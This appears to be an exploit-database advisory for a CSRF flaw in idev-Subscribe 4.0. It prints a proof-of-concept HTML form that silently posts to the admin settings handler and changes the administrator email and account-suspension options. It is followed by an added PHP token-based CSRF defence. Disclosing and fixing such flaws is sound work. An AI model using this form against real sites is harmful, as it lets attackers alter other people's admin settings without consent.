idev-Subscribe 4.0 CSRF Vulnerability

2012-04-05T00:00:00
ID 1337DAY-ID-17974
Type zdt
Reporter Jonturk75
Modified 2012-04-05T00:00:00

Description

Exploit for php platform in category web applications

                                        
< ------------------- header data start ------------------- >

#############################################################

# Application Name    :  idev-Subscribe 4.0

# Vulnerable Type     :  CSRF

# Demo                :  http://idevspot.com/demos/idev-subscribe/admin

# Author              :  Jonturk75

# Greetz: Inj3ct0r Exploit DataBase 1337day.com

#############################################################

< ------------------- header data end of ------------------- >


<form name="form1" method="post" action="../library/query.php">
<input name="controller" value="SETTINGS~update~settings~1" type="hidden">
<input name="EMAIL" class="hiddenarea100" value="[email protected]" type="hidden">
<input name="SIGNATURE" class="hiddenarea100" value="idev-Subscribe" type="hidden">
<input name="AFFID" class="hiddenarea100" value="" type="hidden">
<select name="HELPBOX" size="1"><option selected> Show</option><option>Show</option><option>Hide</option></select>
<select name="STATUSCHANGE"><option> 2</option>
<option value="1">1 - Suspend user account access.</option>
<option value="2">2 - Leave user account active.</option>
</select>

<input name="Submit" value="Submit" type="submit">
</form>



< -- bug code end of -- >
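
The form above carries only fixed, predictable fields and no per-session secret, so the request it sends can be reproduced by a page on any other origin. A server-side synchronizer-token check that rejects such requests, as an added example (not code from idev-Subscribe or from the original advisory); the function names, the `csrf_token` field name and the idea of calling it at the top of a handler like `library/query.php` are assumptions:

```php
<?php
// Added example: synchronizer-token CSRF defence for a state-changing POST handler.
// Function and field names are hypothetical; the application's own code is not on this page.

function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        // PHP 7.3+: SameSite keeps the session cookie off most cross-site POSTs
        session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        // 256 bits from the CSPRNG, unknown to any other origin
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Emit inside every admin <form> that changes state.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Call before the handler acts on $_POST (for example before dispatching "controller").
function csrf_require_valid(): void
{
    if (($_SERVER['REQUEST_METHOD'] ?? '') !== 'POST') {
        http_response_code(405);
        exit('Method not allowed');
    }
    $sent = $_POST['csrf_token'] ?? '';
    // A missing or array-valued field (csrf_token[]=x) must fail cleanly, not raise a TypeError
    if (!is_string($sent) || $sent === '' || !hash_equals(csrf_token(), $sent)) {
        http_response_code(403);
        exit('Invalid or missing CSRF token');
    }
}
```

A page on another origin cannot read the token stored in the administrator's session, so a forged POST that lacks it is answered with 403 before any setting is changed.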


